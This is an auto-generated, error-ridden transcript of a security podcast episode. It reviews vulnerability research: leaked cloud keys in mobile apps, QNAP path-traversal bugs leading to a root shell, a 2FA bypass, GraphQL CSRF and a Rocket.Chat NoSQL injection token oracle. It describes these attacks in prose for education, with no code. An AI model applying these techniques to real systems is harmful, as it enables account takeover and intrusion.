NoSQL Injection, Mobile Misconfigurations and a Wormable Windows Bug< Back to Episode Overview
This transcript is automatically generated, there will be mistakes
Hello everyone. Welcome to the last episode of the day Zero podcast before our summer break. I'm Specter with me a zi happy Victoria Day for our Canadian friends out there. I don't know how many we have but I'm sure we have a few in this episode. We have some impactful Miss configuration bugs, when it comes to mobile a Windows bug and the HTTP kernel driver and some other research sprinkled in before we get into topic. So once again, we are going on break for the summer. This is our last episode until September 6th. So I That's the first Monday of September that we're going to be back. We're not going to be stopping content, completely, just taking a break on the podcast. We will have some other streams for example last week. See, and I did a stream looking at I 2 free which has the cloud decompiler now. So for the first time ever, hex raised has a free decompiler up. There was pretty cool to check out. We didn't really cover that on the podcast when Ida free dropped. But if you want our thoughts on that, like I said, see and I did a stream on it looked into it. It avadh will be going out for that this week so keep a lookout for that. We always put out any videos and whatever and Discord and and on Twitter. So if you follow us on those mediums you'll see immediately when those videos go out. Also we have our mini-series out. Now for making the transition from CTF to real world, it consists of three videos and a free blog posting with those if you prefer blog post the videos, the first discussion box both over. Of the differences and challenges moving into real world from CTF. The second video tunnels in on bone research and some strategies for learning that. And then the final video is on exploit development in a similar fashion strategies for learning it and how to make the shift and the differences between CTF and real world.
Yeah, I made I am and if excited to finally get it out, I've talked about wanting to do this post for quite a while. So to actually have it out is kind of nice covers. A lot of topics. That I think just haven't really been hit on too
much. Yeah, it's a full discussion. I think the especially the exploit Dev discussion was probably the one I enjoy the most. Yes the first one is kind of ramping up into the the other two.
Yeah and the phone research one is more just like I feel like it's necessary for that in order to get into the exploitative rather than treating exploit Devas like entirely
separate. Yeah, you got to kind of lay the groundwork a little bit, so yeah, we cover all of that in the end, those videos. So yeah, just wanted to show those out quickly. With that out of the way, we can move into a little bit of news. So GitHub put out some updates on their exploit and malware policy, you may remember we talked about this, a few weeks ago and there were a few, there were a lot of concerns around unclear, use of terms, and the way they phrase there. Their statements in the policy. So they finally made an update based on that feedback and at least some with some of the stuff that I've looked at. It looks like they've done a better job here. If you may remember the last time, we covered this, the whirring phrase that we talked about the most was the, we do not allow content that contains or installs exploits or some, something along those lines, which shows
concern around the world. Like anything that harms Like a lot of vagueness Just Around. What exactly harm
meant. Yeah. Just kind of leaving things on explained and and leaving it up in the air. So they've now reworded some of those phrases into now like directly supports unlawful activities or malware campaigns. For example, just adding a bit of clarification on what they're talking about and they also added some examples around what they mean by technical harm. Such as causing denial-of-service physical damage. Over consumption of resources with no clear purpose other than abuse. So like not doing a security assessment, right? If you're using, if you're causing a denial of service and there's no clear other intent than that is classified as not allowed.
So yeah. And they do call a like educational content, obviously, dual-use content to somebody start calling out specifically which is definitely a few notes indicating that they're listening to some of the feedback that was there. I mean they did put out the last policy Or feedback, they got that feedback which was largely negative at first. And they have clarified that I mean, it's, you know, the right move on their part. I think like they do need to have a policy that includes the ability to take some things down, especially with GitHub kind of offering like a CDN sort of service oven. They do actually mention also a little bit about what their takedowns would look like in a lot of cases. They mentioned that are takedowns are only we put it behind like normal authentication so you can't just provide it as an anonymous file but need a login to view the pages which I think is extremely fair when it comes to some of that content because that does stop kind of the malware attacks are just kind of grabbing the file and we'll want to like login as a particular particular user. So I was impressively added that information also and I think it's completely
Fair. Yeah, I like these policy updates, I'm, I think. I said at the time, when the initial call for feedback, went out there that a lot of people were being uncharitable towards GitHub saying that, you know, this is just another thing that Microsoft trying to do now that they don't get how they're trying to remove all exploits or whatever. And I feel like people really jumped the gun there and like you said, it was a call for feedback. It's not like they just threw it in there and I feel like these updates That right? It reflects that they're they're trying to act in good faith. They're not trying to, you know, completely tanked. The research, the security research community on GitHub. I think their statements here, especially the way they have rewarded them are are pretty reasonable and resolved, a lot of the concerns that I saw raised on the initial call free back. So yeah, I think they did a good job here. I think they took the feedback and stride and I didn't like nothing really stood out to me as being bad. Dad. I don't know if you have anything to call out but it I think overall it was a positive set of changes.
He had no nothing really stands out as being poor choice, to me. Ultimately, like I said they do need to have some sort of content policy. They have made this fairly clear. They have tried to Define what they mean, by are more free plays that with technical harm and including examples of what they mean. Making it clear that they're not targeting the educational content, they're not. Targeting dual-use content. Basically they've made clear on everything on every objection. I think I've really heard that are every meaningful objection I think I've
heard it does a good way of phrasing it. There have been some unreasonable takes. Okay. So yeah like all the reasonable stuff I think was dressed there. So good job on GitHub, I guess. All right, let's get into some exploits up. First, we have a checkpoint research topic about various application developers who have misconfigured. Badly implemented integration with cloud services, which all-in-all could have exposed over a hundred million records of personal data. Zi all. Let you take this one away.
Yeah, definitely the potential for a lot of Records be out there and they don't they kind of talk about a law office in vague terms. They talk about the general issue, not really going into every specific applications. They have a list, I think it was towards the end here of every application. The rough vulnerability. They Add, I would want to use this as a point to touch on. Well, the three issues that they do talk about our misconfigured real-time databases having your cloud storage gain misconfigured, either with the keys in the application, something like that. And the keys for push notifications being in the application. I want more uses a point to touch off on. Just Cloud Security in general because this is very common. When you start running into any sort of mobile apps or even a lot of just in the cloud application. So things built like, over Firebase from Google, you run into a lot of those cases where it's so easy to not configure security appropriately. And I kind of put the blame a little bit on Google and AWS and Azure and the other providers On providing easily are easy to configure insecurely products, I guess I poorly phrase but the example here on the real-time databases really easy to kind of configure something. Like once I want to say Firebase by think Firebase is the name of their larger application. There's a couple
firestore something I think is the actual name of their storage and real-time database but It's really easy to kind of set that off and when you set up something like that, you're kind of leaving yourself in a position where you're not setting up like a back-end server anymore, you don't have your traditional, here's my front-end application. Here's my back-end server, where I'm running like the database, and I'll write an API in front of the database for my application. Instead, you're communicating directly with the database from the application. And Google, of course, understand like there's security implications of that sort of two tier architecture. So Google is kind of providing the API to the database in the authentication there. But you need to know how to configure that properly. And that's where I mean, a lot of people just don't realize that security implication of one, every user kind of has all the X. And this is the same and point developers would be using I said just really easy to kind of Miss configure and the same deal when it comes to cloud storage and that case, it's more about the keys where when you stop having the back end server, now where do you put the secrets that you need? You should still have something for that. So clients don't get it. That's kind of the deal with the push notifications, as you want to keep that secret key away from the client but it's so easy to just build your application. You're already doing all this like the database logic in the application, why not include these keys in there also that's effectively what they found. It's not earth shattering or anything too crazy. It's just just some very common vulnerabilities. They did in particular find that one developer here, had the keys using big 64 encoding In fact. That's not really much security and I can't even save the developers thought it was scared. You're
not very strong of this station. Nobody will be able to the code base 64.
Yeah, I mean it the thing is the value is needed by By the client. Well, in their architecture, the value is needed by the client. The architecture just shouldn't be so simple. Like they should have a back-end server where Secrets things can be performed or only using apis that are kind of safe to use from the client which push notifications or
not. You could also you could kind of skate around this issue by using Android Secure Storage. No, or am? I was just kind of thinking about it when you were talking about it.
to an extent, you can
Yeah, look, I don't think it's the best solution but it is, it's probably better than base64 coding it.
Yeah. So six for you know, isn't anything but the developer may not have even thought it was
Assume they're intense there. I guess. What kinds of
Records being being exposed are they do only really go off the Google Play installs to get their number. I am lot of them having 10 million plus installs, therefore, you know, however, many
records. Yeah, yeah, it was quite a few records. The one that I found bunny was the ostrow guru-guru one, not even really anything super like technical or anything, but the information that they had stored, they had like the email name gender birthday which is sensitive like personal information. But the birthdate they had down to the minute. They had the minute of the birth date and the personal information that I guess that's important for astrology. I do
Yeah, I mean there is that area, but that's you know what? Beltline meant of the planet at the time of your
birth. Oh, right. Okay, I see
so kind of makes sense if they have it,
but I just thought that was a really funny field in there. But uh, yeah, I think this is a good post like you said, doesn't really turn it in on a specific Target just kind of a more of like an overview and kind of like a research heat. I post calling out what what application developers commonly. Miss you. So All right, up next, we have qnap June at music station and malware remover, which has some issues will say music station had a preauth arbitrary file upload and now we're remover had another arbitrary file, right? That was even more powerful. Firstly, we'll talk about music station, which isn't a pre installed application, but it is a popular app. One of the things that it allows you to do is upload album Covers onto the NOS since it's a music station. That's a functionality. That makes sense of Sport. The problem is they take both an archetype and a file name with a verified image extension. And they combined that to create the file path to write the image to for the cover. But it's not protected against path traversal like, at all. So by just setting an archetype that's like dot dot slash dot dot slash whatever. You can Traverse directories to get an arbitrary file, write as a route to a somewhat controlled Haitian. It is limited by the fact that you don't control the full file name because the code does some like manipulation on the filename like it'll add some unique string I think towards the end of it. So and you are limited by the extension as well. It's going to keep that extension in there so you do get the arbitrary file write as root but the impact is kind of limited there. You're not really going to be able to overwrite files very easily just just plant new ones on there. The the The second issue is in malware remover is more impactful though, and unlike the last one, it's a pre-installed app and ironically it also can't be removed. So if this app is installed your your kind of vulnerable by default
because that kind of like there and you know, anti malware ends up, being the issue of or anti
virus. Yeah, yeah. It's a fun class of products a hit. So the issue is, when it runs its malware scans through a Cron job, which it'll do it a certain Every day which you can configure, it'll run a script to do that scan, and that script will Source a common script, which traverses a directory in the package called modules to load in Python modules whatnot. And one of the modules of loads is the auto, upgrade module. And that module has an arbitrary file right issue where it mounts, a temporary file system on temp config. And if that file system contains a tarball, it'll extract that to a temporary folder. Well, when it does That extraction there's no checks against path traversal and there's a race on the config Mount because somebody can just right into that directory. While the script is operating on it because they do try to do some checks on the file system, they mount. But I mean they can just somebody else can race that and do it after the checks. But before the tarball is unloaded, so and temp is accessible to everyone. So because of that, you can abuse that and use something like evil are to plant files on this. Some again, you get that file right as a route and where it's not as restricted as first one. It's fairly easy to get a reverse shell as root and then pop the mass. The next time the malware remover, does the scan? So yeah. I mean the second issue is obviously a lot more impactful than the first one but the issues themselves are not really to Earth shattering. It's it's really just a tale as old as time. We don't check the paths, especially in tarball like tarek's. Traction. Yeah, we've that's just an area that is not protected against very well.
We've talked about these sorts of issues quite a few times, I think, in the past year, yeah, the podcast in general
really Yeah, if we had to do a count, I don't even know how high it would be, but it would be high. Maybe like 50 or something, it's a lot. So yeah, up next we have a quick two Factor. Authentication bypass through Force browsing. The affected product was kept obscure. They didn't want to talk about it because they found it in a private Bounty program. The post first touches on Force browsing, which is kind of a fancy way of saying broken or non-existent access controls. Usually with this target, you need to provide a one-time code that gets sent to the email address. When you register to validate that address. It's unclear if this also includes needing that to be an internal domain email, or if this is just by passing the need to verify emails in general that they don't really talk about that too much. I guess because because the private research
because it's a 2fa bypass. I'm assuming it's and because they only talk about here, I mean I'm assuming this is just like they bypass it At like, just the one time. Like, it's not really a continue thing. And I mean having an email token, there are a few websites that will do that. Where it's like magic login Link in general, though. I think it's usually you just kind of verify once they bypass the need to verify that one time.
Yeah, the details are a little bit lacking here, which I do kind of understand where they wanted to not, give away too much information to keep the product, you know, not noticeable to whoever is reading it. But anyway, When they, when they do that one time, code check. It's all enforced on the front end, but the problem is, you can intercept the post request, which usually goes to the API sign up. Verify and point, you can change that to go to API sign up and just remove the verify off the end and then add the password into the request body where it usually isn't there. And then whatever happens on the back end when it goes to parse that it just accepts the ability to create the account without needing to send that one-time code. So it's just by passing the one-time code requirement. For registering an account. So I'm not sure how high the impact really is there. Like I said, well, I'd
like you're able to register an account is any email Um, I would be interesting so you're kind of getting it or like if this include like for golf password or something, I'm assuming not because then they probably won't mention that. But the ability just in general to sign up with any email I was bit disappointed on this one because it does mention as a second Factor authentication bypass whereas email authentication like unless it's being used during the login. Like I mentioned that sort of magic link. I wouldn't consider it a second Factor Authentication. This one doesn't really come off as second Factor authentication to me, I can understand why they call. Like, I don't want to be all nitpicky on what they're calling their post. I just had a different idea. When I saw the title of this, the one thing that does make me kind of raised question here though, is they do mention specifically that you remove the / verify from the post request in the body of that post request, add password and a password. So presumably you can actually put it in a password end. It's not actually specific to that path. Sword. It's just interesting that that in particular was needed, especially since it mentioned that you do. Fill out the password as part of that initial post, like, when you're making that post request, you do need to fill out the password. So the fact that it's not there is like when it's going up to verify, it's just a little bit weird to me. At first, when I was reading this, my thought was made this a something like, It would just kind of iterate over the keys provided and set those fields within the database for the user. That seems kind of like it's a mass assignment type of issue, but it's not unheard of to do that. So it seemed like okay so you just provide the password when they're not expecting it. But now I just kind of noticed that my understanding there's just a can because you do send the password initially unless it just doesn't actually use it at all. But yeah, because my Like here was that this was actually more towards a mass assignment sort of issue but within the database so assignment of database columns. So you prematurely issue the password and set it to something. So you're able to login and bypass the actual verification that might not be the case. I will say, I don't think there's any way we're going to know what it was like it's just a the information just isn't there in this
right off. Yeah. Yes, we're kind of in our in our favorite place to be, which is speculation land. Yeah, the main place where my mind went was like we're websites will kind of whitelist emails. You can use the sign up and that's where I was thinking. This might be useful for for bypassing that verification of the email.
But they're example email is a Gmail style. Calm.
Okay. That's true. So,
so, is gmail.com actually like the same.
Gmail. I have no idea. I would I don't know. Maybe they have like a maybe Google does registered that one to
I've never started just yeah I know I haven't seen it either. Could doesn't look like it's loading. So my assumption is that might either be a typo or they were just hiding it in general like not showing their actually no fair enough. I just noticed that
typos is, probably my guess, but yeah, hard to comment too much on what the impact. Exactly is where we're so limited on the target information.
Yeah, I mean being able to bypass severe
is worth while an interesting attack with that. I mean, could they sign up for an email that's already
registered. Oh, that isn't that? What I
would be one way you could take this, and they don't indicate like we don't have that information but that would kind of be one attack. That would at least be interesting to try stretch. Since it does seem like there is a little bit of trust in the client going on here, where my kind of like you skip some of the checks such as this verify. So there's a chance of that sort of checking might be skipped. Also, there's also transitive
wouldn't be That's a good time to call out. I like that one.
yeah, but I mean, we don't know and honestly there just isn't enough detail in this post, go beyond that, but but I thought it was a Inter are a potentially interesting post, at least the
cover. Yeah, yeah, I agree. All right. Well, moving to a post from do and SEC about graphql and see Circe again. This is one of those posts were it's not really touching on a specific issue. More just talking about the class of see serves as a whole and where they can appear even though the developer might not expect it when using graphql, so they go through a few examples there, one example, they give is with post requests, they may think that because like, And Jason content types are believed to be invulnerable to see surf. Since you typically can't send those requests types from a Ceaser context,
so I would actually touch on that. Like if you're in an environment where flash is available. You don't need to exploit flash for this, but I used to have so much fun doing kind of complex. See surf because plash would like you set, certain headers like you wouldn't be able to send an HTTP request, but you can just, you know, inject your like your attack page would include a little swf file that would like you make other HTTP request and they would be made in the context of the browser still like with all the cookies and everything. But you can go ahead and add whatever headers you want. They ended up reached. Ring flash, they have restricted the headers you had a couple times so I'm not sure if like current flash would even like you do application Jason that is kind of a rough targets. I mean it's not like flashes widely deployed anymore but that was one way you deal the application. Jason issue that I guess kind of Forgotten. Oh, wasn't well, no one even at the
time. Laughs really was a hacker's best friend, huh? It was. Yeah. So, yeah, so application developers may think they're kind of invulnerable to see surf with those requests types, but they can be fooled because the middleware will sometimes accept form URL, encoded requests in place of them, which those requests can be sent from a Caesar contacts, that kind of opens the door to the Sea. Serve type issues. Another set of issues they mentioned is AC surf due to using get requests both in terms of queries and mutations. I think the Jackalope
do but people definitely. Yeah. Well do it in terms of the middleware, something else that middle will provide, that isn't mention. Here is occasionally, you'll be able to change the method of the request and there will be in this. Just depends on the middleware. So you have to kind of do the research, do the legwork on that yourself, but where you can include something like a unique. A URL parameter underscore method and change it from get or will put posts in there even though you're sending as a get and it will rewrite it for you. And I have seen that also for indicating that it's adjacent type request versus the standard one. So you can send a standard thing even though it's not actually usually this kind of meant more for like during development period. But I have seen it hip production. It is just something worth looking into. I think we've covered it. For, I forgot to look up what episode. It was quite a while, back that we will have covered in attack using that though,
I was about to say. I can't recall specifics, but I know we've covered that exact type of issue before with, like, the request being Rewritten. So, but like you said, it's been a while. So I, you know, my memory is not good enough to remember when that even was exactly. So I'd have to have to go searching, but yeah, like the one thing they mentioned there is like a way they tested, the get request being abused could happen is if an application is misconfigured and exposes the graph E2 well console, which allows both query and mutation for quests. And then another issue they call it is. When State changing operations, like setting user data is exposed on, get queries. And the example, to give there is one where, like, it sets, a user email and takes an ID value, which an attacker can control in the query toward the end, they talk about how Types of issues can be abused to perform things. Like cross site, searching to exfil, State Secrets. It's a perfect medium for that. Kind of attack along
site search actually specially when you're doing like the timing attack on that, if you're able to get something to head to graphql, that is a really good way to use it, obviously, because graphql, you're using it to query. It's a very powerful query language. You can get a lot of information that way and figure out a lot by creating the Right. Timing
query. Yeah, they also released an extension that's worth calling out. They released an extension called in ql, which is a perp extension to automatically test for the issues they detail here. But yeah, like I said, it's more just talking about the things that can happen, not things specific to a Target, just things. So be aware of, I guess, if you're, if you're a developer, they did also include some stats from research. They've done on various Oh, stop companies. I don't think they really they don't really go into like specifics on what those companies are but placement understandable. Yeah, completely. But they found that 50% of them were vulnerable to cross-site searching and 10% of them were vulnerable to more powerful sea, serpent tax. So yeah, that was kind of a nice little gem. They had at the end there, but overall just a good post and we've talked about graphql before and in some topics, but I don't think any of them. It covered as much breath as this article has?
Yeah, that's thing. That's one doesn't get too much of death but it does have good breath on it in terms of just covering the good number of attacks. But yeah, we have covered graphql before. I don't think we've mentioned in ql before but it is quite useful. I should have had some other tools kind of ready to recommend also but I mean, this does also just come down to protecting against see surf though, which is a reasonably well, understood attack, especially now you're starting to get same site cookies. If you start using that, that'll make some of these attacks more difficult, although graphql is often meant to be, I guess, I say often not exactly at times. It is meant to be consumed by a lot of different
So there is still kind of the room for such tax though. I guess, when supposed to be consumed, it probably shouldn't be doing any mutations.
But yeah, it's one of those posts where it's talking about a common bug class like you said, C Surface, pretty well-known just in an area that people haven't really thought about too much yet and haven't haven't really been hammered yet? So
well, I mean it's not that people haven't really thought about it because we've talked about attacks that have gone on to abuse graphql and acts like this. And you know, whatever way they could so it's not like it's not there but said like you said there's a breath to this post that's worth discussing and worth pointing
out. Yeah. I think the most recent one we've covered with some of the Facebook issues and how graphql was abused their yeah.
So although that was more of a they already they had excess acid a code or like they
had I think it was exercise. Yeah,
yeah. Are they had the token actually and that they were to use that steel, the steel to see surf token, in the make further requests because the see serve token was in
execution. Yeah. So so for example Case here is turning off auto Escape. So then they can set the filter such that it actually performs code execution, that was their example attack. I mean, it really does come down to just that mixing of code and data. Or in this case, the configuration data. But, like, it's that mixing of data, that shouldn't mix, I guess would be better way to put it. Yeah, you should have your configuration setup separately from providing user
data. So the key issue there is just that, you know, problem of allowing untrusted users to pass in the objects. The second stage, this is kind of interesting question, would you consider the fact that an application takes configuration data through the express render API a problem on its own? Or would you not sense? It can't be abused without another issue to chain with. Its kind of a, I could see you kind of going either way on that, but I would like, personally, I would think that that would also Be like an issue worth calling out like its own kind of CDE, I guess.
Well I don't know if I'd call it a CV. Um just because like I said it's not a security issue on its own. It depends on the actual application developers, making the insecure choice of allowing user data to come in as a configuration data like this could easily be solved by and their templates using like a separate data field. Where they would end up passing the sense, so then it would be treated as part of the, I guess upper map of that dictionary with that could contain configuration. So there are ways like the developer could use it. It's a poor design choice for sure. I don't know if I would necessarily expect the cve to be filed over this vulnerability, though, there's just reporting it as a high-level potential misuse location because like I said, every choir somebody Downstream write bad code, it's it doesn't stand on its own as an issue. You need to have a used poorly and using Code poorly. I think we've talked about this before when it came to To a crypto Library. I forget what it was. We're just comes down to like yeah there's bad code and bad usage of those libraries and those libraries I think should be hell, to should be held to a certain standard of like ease of use. This was especially so when it came to the crypto issue that we were talking about, in this case they are following a fairly common pattern Like a lot of templating engines will work this way. Or will work in a similar way. They could do a better but yeah I wouldn't necessarily call this on its own a CV without Without something internal being exploitable,
I guess. Yeah, I think I would call it more of like a red flag or a code smell. I just wanted to bring up the question because it is the kind of thing where I have seen some debate before about like, whether or not it should be considered, maybe not a CD specifically. But like whether or not a company will take that as an issue and actually like address it or whatever. So if your TV is just like the shortest way to say
that I guess the other way to kind of, think about that. So it's like what about a bug Bounty? Would you report this in a bug bounty? That I think is a more interesting question. I would want to lean towards
no. I can
understand why somebody that bike just you know want to toss it out. There is like what? Maybe I can get some money for this? They, you know,
accept it. So the argument that's kind of foreign it forming in my mind, if I wanted to play Devil's Advocate, it's like if you wouldn't accept this issue in a bug Bounty then would you accept like a an authenticated access or something and a web app? You need a first stage attack to be able to get in right it's behind authentication so you need an authentication Bypass or something but it's still an issue so I guess but like obviously on specific kind of depend on scope but
No sighs. I think your excess comparison kind of falls apart because it's an issue elsewhere with the cross-site scripting. Like I think you should still accept cross-site scripting regardless of whether or not if Antiquated, whereas I can kind of be against this one. In the case, cross-site scripting your coat like you're the you're the application maintainer and it's your code that is still vulnerable to cross-site scripting. In this case, your the library maintainer you've built this Library. Airy. And it's somebody else's code that is using it in insecurely who's calling, you know, a function. They shouldn't who's using it in a way that they shouldn't be using it. It's somebody else's problem. It's not Library maintainers problem. Whereas cross-site scripting in that case. It's all inside of the one
application. That's a very fair distinction. So yeah, fair enough, I'll throw away my my My Little Devils Advocate argument then.
So I mean I could understand like if somebody works say they can report if like I feel like it's waffle, it is one of those very low rating issues. Like low severity issues on its own. It is one of those things that feels like it's just like, hoping you're going to get a payout, hoping you're going to get a little money out of it and that's all. I wouldn't really blame somebody for it. I disagree with it. This is something that you could report on a vulnerability assessment application Level pentest, something like that. You know reporting it because you're trying to let the client know like, hey here's what you need to be aware of. Here's kind of the thoughts. Here's how you can mitigate it do with that as you will and you're just providing the client. All the information bug bounties, I think do need to be a little bit more. Elective
on. Yeah, in terms of bug bounties, specifically you're going to have to squeeze it into the scope. Basically, if they consider this type of issue out of scope which they most likely will then I guess you could submit it if you wanted to but don't be surprised if it just gets closed is invalid or whatever. So yeah I
mean because this is the same If you were to imagine a library performed providing in like the ability to call, eval kind of the same idea. Like it's not a good idea but without somebody actually calling it, there's no
vulnerability. Yeah, you have to demonstrate, it can be taken advantage of, in some kind of way from from an attackers perspective. So,
so I do think it's fair for GitHub scaredy lap to call this one out. I do think of what an interesting had they called this out, like, just call this out as a class of attack on, like, multiple different template engines or at least kind of cover that they did. Look at other template engines. It's like they're kind of calling this one out that I haven't heard of the squirrelly.
Yeah, I hadn't heard of it either.
Maybe we're the only one doing it. I don't know.
The way I phrased it made it sound like it's not like it sounds like it's pretty common thing. So
yeah, so I would expect more more reports either to come out from this that are very similar or something. I guess, you know, they did have their deadlines and just disclose it after the deadline to, maybe, we'll see more in the, in the near
future. Yeah, I mean we seen GitHub do Post before about like things they report on often. I'm trying to remember the specific title that I have in mind. Yeah, I can't think of it right now but they have done some of those like researching I post before where they call out a class of issues.
Oh yeah. I really like their look at the glue where they were looking at attack want to say they called it attacking the glue but they might not have where they looked at attacking the middle layer between like Python and see where he have that interoperability layer and looking at finding memory Corruptions and stuff in those calls. I thought that was a really interesting from them. And I think if they It's something that was anything. The templating engine. Oh, did a post like that in the templating Engine, That Could have some really interesting content to me. GitHub security lab the, Some solid research it. CN mentioned out of I found a bug in math of JS once and thought it was a really a bug because it was basically an eval function. Then months later, someone also found it and made it into a huge. She'll that's the thing. This is the type of issue that can you can get Behind you on this sort of issue pretty easily I think remaining professionally. It's still kind of be, you know, if you're hired by them to be doing this assessment, give them all the information just be like, you know, be real about it. It's not, it's not an issue on its own, but, you know, be real about it. If it's on a bug Bounty though and outside that I have a hard time recommending. You actually Call it out. Oh, so I guess one thing you might want to consider is documentation around the dangers of the function like I guess maybe not reporting is bug Bounty. Just reporting it as like. Hey I noticed you guys do this. You should really document like the dangers of it or something like that but it is the type of issue especially in eval compared with this, which is just the configuration aspect although it can turn into RC. So You can relate to the eval eval. Being a little bit more direct. My feeling is like you could very easily, you know, get on Twitter and rile up people around it,
start Twitter mob, get the pitchforks behalf was we've definitely seen it before. Bug fixed by mob. Yep. At that should be an actual label. And and also, they called out. Also templating engines are so bad. Yeah, it doesn't surprise me. I don't really look at templating engines and I haven't really seen much of around them. I don't know if Just because they don't really get as much publicity, but doesn't really surprise me, especially with, like, how complex they have to be. Sometimes the, with the features they want to provide. So, Yeah we'll move on to our next topic though. Which is to know SQL injections and Rocket chat which is detailed by sonar Source. The way they interact with each other is quite interesting. They State up front that each on its own could be used to hijack. An admin account though. That is a little bit shaky on the first issue but combining them can make for a more stealthy attack. So we've covered Rocketship quite a bit before on the podcast in the beginning of the post. They talk about some Brown, mostly the fact that rocket Chad uses mongodb for user data, which I think we've talked about before to some issues around that, the
first means there's nothing necessarily wrong with using mongodb
know. So I just wanted to call it the we talk about rocket chat background a little bit
before. Yeah. Rocket chaff like they're really good on hacker one like they disclosed lost their reports and there is a report for this one also on hacker one, they're really good. So that's why we end up kind of bring them because they do disclose their vulnerabilities and are very open
about it. Yeah,
but I will add like with mongodb. It just comes down to the fact that developers are necessarily thinking about the complex queries that you can do with mongodb. That's where the vulnerabilities come in here. Like your ability to provide provide an object in the place of just a standard string
query. Yep. So the first vulnerability is a blind. No SQL injection in the get password policy, Method which can be called on a user without being authenticated but they do need to know the email for the account to access and that user can't have two Factor authentication enabled. The problem there is when they take the token from the user provided parameters to that method just like zi said they just take the parameter and pass it straight in. They don't make sure it's just a string. It could be an object. So what they abuse here is providing a regular expression or a wrench. Expression, which allows you to effectively create an oracle for your Brute Force token using that Oracle. Now abusing this issue to take over an account, doesn't immediately give you elevated account. Privileges, you could Target an admin account with it, but it does create a lot of noise of reset token is going to get sent to the user and they're going to get logged out. And they'll know, something is wrong because their password has been reset. So they're not going to be able to login anymore. So, because of the fact that it's so noisy, Zi against the user and the fact that admin should have to fa enabled using the Sonic
same exact. And I'm sure there are a lot of admins who don't go and actually enable to wife a
the hacker one report is a bit more concise but yeah it's a good blog
post. Yeah up next we have a cork slab blog post on RFID and monotonic counter tearing. This is an issue that I don't think we've ever really touched on before. This is kind of a unique issue in that respect.
It's a unique issue. They did a great job explaining it because it's not something. I was really familiar with. I know your little bit more into the hardware stuff, but even you haven't really done much with the
RFID know. Or if ideas, not really, in anything that I've looked at, it's kind of been, like, out of scope of what I'm interested in.
Yeah, it's one of those areas that like they're definitely people who are interested in do that research but like, you don't necessarily follow in to follow a Twist. If you're just looking at Hardware, otherwise the talking about this monotonic counters, the counter only Goes in One Direction, you know mono. So in this case, they have these counters on board that are only supposed to go up. Parents, you're not familiar with the concept of for RFID as low power or they don't actually have power themselves. Instead, the reading device will power the check, So tearing or tearing event is when you move the chip away from its power source so you can kind of imagine the case where you've got it, right? Going on and you move the card away from power source that right gets interrupted. That's where the anti tearing comes in the idea being that you can't like tear the Reich and get the counter to go back down or rig set it to see her or something. So the attack that they're covering in this post ends up being basically about doing that taking this monotonic. After that should only go up can only be incremented and resetting it to zero, which I thought was a cool tack. This is actually their third blog post, looking at some different, or look at different issues with tearing and different attacks, that can be done there. So all the links are actually in the bottom of this post. So no need to check those out. They do cover a lot more detail and some of their past post. Oh, and one other concept that kind of matters to this attack is the idea of a weekly. Graham bit. So this can happen with some of the, with the tearing. If you kind of interrupt that right, you can end up having it seems. It's a little bit more complicated than just like you tear during that particular bits, right? Or something. But the idea of it being that one of the
it's being erased and then Rewritten, so all the rights will basically zero or one the bit and then actually replace it with the value or flip all the bits necessary. So what can end up happening is you get this weekly program bit that sometimes when it's being read, will be read as a one and sometimes when it's being read, will be read as a zero. It's usually, you know, they're powering the bitter, however, they're doing it, you want to get it above a certain threshold. So it was right in the middle there it can be read as either way, just kind of like a little bit of non-determinism. So the attack they end up having Like I said God was able to reset the counter to zero and the way they did that was taking advantage of one of these weekly program bits or a bit that could be weekly program. I guess I should also mention the right processor. They have this anti Terror and tragedy so you shouldn't be able to corrupt it. That process is every counter is backed by to memory slots that will be riff well if they won't both irritated one but what it will do Is that when you write to us, you'll have these two memory slots. Every memory slot also has a validity flag. Next wave which just has a static value that gets Rick run written. And Rewritten every time of zero X BD, so, when you go to Owner, Chad, IAB are RFID, glitching, I mean, kind of glitching. I don't know. I generally when I think about glitching, I generally think I was going to say, I think of like power of glitching by guests are and could be power glitching.
Yeah, I was like very well under that
I was going to say, I don't really think that is glitching but no, I guess, I guess you're right. anyway, so the way they would do the anti tearing is They would check that validity Flex. They would personal just to read the counter. They would look at both counter values. Look, make sure they both are find one that has a valid. Like they both have a valid flight. Then it would take. Whichever one is higher And then when writing to it or incrementing it, they would right? They would read the value, of course, and then whichever memory slot. They got back, they would write to the other one. So if this right get ends up being corrupted, get storing, the old value will still be knowing and if you know, still can't be decremented So, they're attacked though. What they kind of targeted was they would increment. They would find one of those weekly program bits where they can just keep trying to read or her either read it. And notice the difference kind of happening. They would send one of the counters to just a power of two. Were the only bit set was this weekly programmable bit So, that counter saw would just feel all zeros except for one bit. And so, occasionally, that might be red and it will be read as a zero instead of just that one bit being sacked. So if they were to tear during the setting of the other memory socket airing early so that they end up having that validity flag, not be trigger. Then when it goes to read the, it'll basically fall back on using the potentially zi Road flag. So trying that A few times They can basically get it to reset to zero. I thought it was a cool cap. They do a much better job of explaining it in the post and they have a lot more background in their earlier post. So if you're like me and don't really know what kind about this earlier, post were definitely a lot of help but I thought it was a really cool attack.
Yeah, of course lab in general. Just does a really good job with these kinds of posts. And they're always interesting in the way that like a lot of the posts I see from there are things that I just never really see talked about elsewhere. Like I said, this is a an attack that I haven't even like we've covered some white papers. I think that touch on RFID and I don't think this attack was mentioned in them. It's just something that you don't really think about it. It's Unique to how RFID is done. So yeah, I mean it's a full attack. It is a little bit over my head because it's not really in my area, but I think it is a poor right up and it's made, as accessible to me, I as I think it could be, I guess so,
so thank you k9 for the
bit. Oh, thank you. Awesome, 69 bits, nice. Alright. So with that said, we'll move into our last topic. Our last exploit topic of the podcast, which is from zi zi. This is a horrible bug. Although, I will have a question about that later in the windows internet, Information Services, where is the bug is kind of interesting. The post is not that great, but again, I will get into that in a little bit. This is a service that's typically used on Windows servers for things. Like hosting HTML, ASP PHP, whatever. And windows has their HTTP stack implemented as a kernel mode driver, which is probably not the greatest place to have that, but it's windows. And it probably Harkens back to Legacy and wanting the best performance possible. Not wanting to deal with context, which is and whatnot, but if there's something you shouldn't have in Colonel, it's probably something like this. So yeah, the post starts out, giving some background on HTTP, headers And how they're structured. I'm mostly going to skip that because that's relatively boring and well-known the header that me if
you're reading this like as an outsider you probably already know a bit about how HTTP works. It almost feels like this is copy and paste like they are providing this to their clients. This isn't necessarily for vulnerability of research. Well the post is where vulnerability research to consume but clearly something Things are Written with the idea of like they're passing a decline to maybe need all the background.
